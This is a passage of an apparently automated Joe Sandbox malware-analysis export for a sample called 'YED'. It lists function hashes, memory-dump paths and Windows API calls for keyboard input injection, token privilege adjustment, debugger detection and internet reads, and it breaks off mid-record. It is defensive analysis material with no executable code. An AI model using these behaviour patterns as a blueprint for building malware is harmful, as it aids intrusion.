                                                                                                                                                • Opcode ID: 703544ad32549b2d3d6e36a2dfaa81ab0869d40990d37b40198ce6377c772828
                                                                                                                                                • Instruction ID: 405147b5c0a672c197a608da1a343dd869c0678c7f280442cea7a78933d08bd7
                                                                                                                                                • Opcode Fuzzy Hash: 703544ad32549b2d3d6e36a2dfaa81ab0869d40990d37b40198ce6377c772828
                                                                                                                                                • Instruction Fuzzy Hash: AE516B71518300AFD710EF24D886AABBBE8FF99754F00892DF58997252EB30D954CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0027AAAC
                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0027AAC8
                                                                                                                                                • PostMessageW.USER32 ref: 0027AB36
                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0027AB88
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                • Opcode ID: 4922138acab110877c0c034e6c8dd5ce254f72a1edd92a22304851d8520de795
                                                                                                                                                • Instruction ID: 7aaecf49d6ae20f5070db603f6d22c889290e6f01279902722b918fa04f9b398
                                                                                                                                                • Opcode Fuzzy Hash: 4922138acab110877c0c034e6c8dd5ce254f72a1edd92a22304851d8520de795
                                                                                                                                                • Instruction Fuzzy Hash: 1D311730A60209AFEB25CE64C805BFE77A6ABE5334F14D21AF189521D0D77489A1C752
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InternetReadFile.WININET(?,?,00000400,?), ref: 0028CE89
                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0028CEEA
                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000), ref: 0028CEFE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 234945975-0
                                                                                                                                                • Opcode ID: dd9e5ebad0191d981bb866c30147b8bd4059a1b6a572059c857ae26c842106c0
                                                                                                                                                • Instruction ID: 22312d17f8614a1ff785c1af202eccc6f4b075f601ad8c1bcb2639fac22ba225
                                                                                                                                                • Opcode Fuzzy Hash: dd9e5ebad0191d981bb866c30147b8bd4059a1b6a572059c857ae26c842106c0
                                                                                                                                                • Instruction Fuzzy Hash: 7221CFB5521306ABEB30EF65D948BA7B7FCEB50314F20442EE646D2191EB74EE148F60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0024271A
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00242724
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00242731
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                • Opcode ID: 14fd6687245d2bf9667710d862eb3d2b010f8b1676dcdeb588643f7ec9c1ffbd
                                                                                                                                                • Instruction ID: b85e87645019ec2925a4ec7fa819e7e8a09cfbb8344e0b8862d071c02a5b5bde
                                                                                                                                                • Opcode Fuzzy Hash: 14fd6687245d2bf9667710d862eb3d2b010f8b1676dcdeb588643f7ec9c1ffbd
                                                                                                                                                • Instruction Fuzzy Hash: 6531D57491121D9BCB21DF64DD887DCBBB8AF08310F5041EAE80CA7260EB309F958F44
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 002851DA
                                                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00285238
                                                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 002852A1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1682464887-0
                                                                                                                                                • Opcode ID: 4b48a2080170cf7aacc57ba9e99d9ae6f9bb136f13e0d2ab11161ea7005eb58c
                                                                                                                                                • Instruction ID: 2c19c4d6e157c73c1b3dcbe50496baed4ac2797b205e95ea86fc943f998df34a
                                                                                                                                                • Opcode Fuzzy Hash: 4b48a2080170cf7aacc57ba9e99d9ae6f9bb136f13e0d2ab11161ea7005eb58c
                                                                                                                                                • Instruction Fuzzy Hash: 2B314F75A10518DFDB00DF54D888EADBBF4FF49314F148099E8099B3A6DB31E856CB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0022FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00230668
                                                                                                                                                  • Part of subcall function 0022FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00230685
                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027170D
                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027173A
                                                                                                                                                • GetLastError.KERNEL32 ref: 0027174A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 577356006-0
                                                                                                                                                • Opcode ID: f78f86036d7ab77b5dccab036098916932c5d0b26f02d50ff49b2205e6117749
                                                                                                                                                • Instruction ID: 71526911a19d54129504eb780207cb9ec1a28e43f6a485050dbfc168d9fb4f26
                                                                                                                                                • Opcode Fuzzy Hash: f78f86036d7ab77b5dccab036098916932c5d0b26f02d50ff49b2205e6117749
                                                                                                                                                • Instruction Fuzzy Hash: C61191B2424305BFD7189F54EC86D6BB7BDEF45714B20C56EF05657241EB70BC618A20
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0027D608
                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0027D645
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0027D650
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 33631002-0
                                                                                                                                                • Opcode ID: 848456fc179d357fe1ee47325f6eef4642c790e4c7b4f16ab40b5483b9492ca5
                                                                                                                                                • Instruction ID: fc6a81c3369f35ab7e1d606b71ed3701916a5c232774a3009e559b5874338cad
                                                                                                                                                • Opcode Fuzzy Hash: 848456fc179d357fe1ee47325f6eef4642c790e4c7b4f16ab40b5483b9492ca5
                                                                                                                                                • Instruction Fuzzy Hash: C5116175E05228BFDB108F95EC49FAFBFBCEB45B50F108155F908E7290D6704A058BA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0027168C
                                                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002716A1
                                                                                                                                                • FreeSid.ADVAPI32(?), ref: 002716B1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3429775523-0
                                                                                                                                                • Opcode ID: 33c6148f5416482cb1b6e3f7bd11b0b25be6c06979b23af07ce2b0276050a46c
                                                                                                                                                • Instruction ID: b1d22248fbb7fedb4fa22c9e4da0302845a70e491121ee964fdd6716ed2b6a81
                                                                                                                                                • Opcode Fuzzy Hash: 33c6148f5416482cb1b6e3f7bd11b0b25be6c06979b23af07ce2b0276050a46c
                                                                                                                                                • Instruction Fuzzy Hash: 26F0F47195030DFBDB00DFE49C89AAEBBBCEB08604F608565E501E2181E774AA448A50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: /
                                                                                                                                                • API String ID: 0-2043925204
                                                                                                                                                • Opcode ID: f7fcf3df363ebca8749b3c158f705ade2fa0dceef1a9099d8a1b48c3bfef3eb3
                                                                                                                                                • Instruction ID: 59e6264159e2e461a715c6cd40b28cfe56131a7935bb9dccf36382bff4493412
                                                                                                                                                • Opcode Fuzzy Hash: f7fcf3df363ebca8749b3c158f705ade2fa0dceef1a9099d8a1b48c3bfef3eb3
                                                                                                                                                • Instruction Fuzzy Hash: 9B416C7291121AAFCB28DFBDDC48EBB7B78EB84314F2042A9F905C7180E6709D50CB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 0026D28C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: NameUser
                                                                                                                                                • String ID: X64
                                                                                                                                                • API String ID: 2645101109-893830106
                                                                                                                                                • Opcode ID: 2ac6dc8aa9446ed32d07386747c7d0f67484d8f408d99116242a383f12f73cb9
                                                                                                                                                • Instruction ID: 35d64401a73fb36544bacfe4ac377f200263269887baf330721c2f331ead62e6
                                                                                                                                                • Opcode Fuzzy Hash: 2ac6dc8aa9446ed32d07386747c7d0f67484d8f408d99116242a383f12f73cb9
                                                                                                                                                • Instruction Fuzzy Hash: C3D0C9B482516DEBCB90CB90EC88DD9B37CBB04305F100151F506A2000DB7096488F10
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                                                • Instruction ID: bf09ed8c9746f99418ebe908a1f45a77062fc60f4a97dd1f4bbf4101515f712c
                                                                                                                                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                                                • Instruction Fuzzy Hash: 53021DB2E102199FDF14CFA9C8806ADFBF5EF48324F25816AD819F7384D731A9518B94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Variable is not of type 'Object'.$p#.
                                                                                                                                                • API String ID: 0-2365962978
                                                                                                                                                • Opcode ID: 1dac3d9240c5337cf7d54521346dbf6f9e3471c21b142429def325fc4f590477
                                                                                                                                                • Instruction ID: c4bc6f724de54e7c7575e6462637e3283b11295eb3808ebc6d48451917c882fa
                                                                                                                                                • Opcode Fuzzy Hash: 1dac3d9240c5337cf7d54521346dbf6f9e3471c21b142429def325fc4f590477
                                                                                                                                                • Instruction Fuzzy Hash: 2E32AE74960219DBCF14DF90D881AEEB7F5FF24304F20405AE806AB292D771AEA6DF50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00286918
                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00286961
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                • Opcode ID: cb92780e3fd2d62d2ec6eb52ce89e3d25a4b76f46219c4e8d5c9fb03277b53c2
                                                                                                                                                • Instruction ID: 5938a820a7d811f1ca063cf194a096bf58ea478e7144e416c6e838d317ec93fc
                                                                                                                                                • Opcode Fuzzy Hash: cb92780e3fd2d62d2ec6eb52ce89e3d25a4b76f46219c4e8d5c9fb03277b53c2
                                                                                                                                                • Instruction Fuzzy Hash: E01190356142019FC710DF29D488A16BBE5FF85328F14C699E8698F7A2CB30EC55CB91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00294891,?,?,00000035,?), ref: 002837E4
                                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00294891,?,?,00000035,?), ref: 002837F4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                                • Opcode ID: dc1d64555999c368520e0f2d12512daf45ca0a219d81a8cf0da919615b3fdb7a
                                                                                                                                                • Instruction ID: c5d6cc42b79fe6b086df1262d8e5f9467a83d855c4bafb169f1d10e1468b6bd6
                                                                                                                                                • Opcode Fuzzy Hash: dc1d64555999c368520e0f2d12512daf45ca0a219d81a8cf0da919615b3fdb7a
                                                                                                                                                • Instruction Fuzzy Hash: E3F0E5B46153292BEB2067669C4DFEB7AEEEFC5B61F000175F909D22C1D9A09D44CBB0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0027B25D
                                                                                                                                                • keybd_event.USER32 ref: 0027B270
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3536248340-0
                                                                                                                                                • Opcode ID: 98cafa292266ad9cb427ec8a0df8dd0f2119e0ae2296bf3a245d0df7714cdc57
                                                                                                                                                • Instruction ID: da59271a75e726464f8446dd9b3cc857d2fe7ff626842db19ced525ae560d42c
                                                                                                                                                • Opcode Fuzzy Hash: 98cafa292266ad9cb427ec8a0df8dd0f2119e0ae2296bf3a245d0df7714cdc57
                                                                                                                                                • Instruction Fuzzy Hash: 4EF01D7181424EABDB059FA0D805BBE7BB4FF05309F10800AF955A5192C7798611DF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002711FC), ref: 002710D4
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 002710E9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
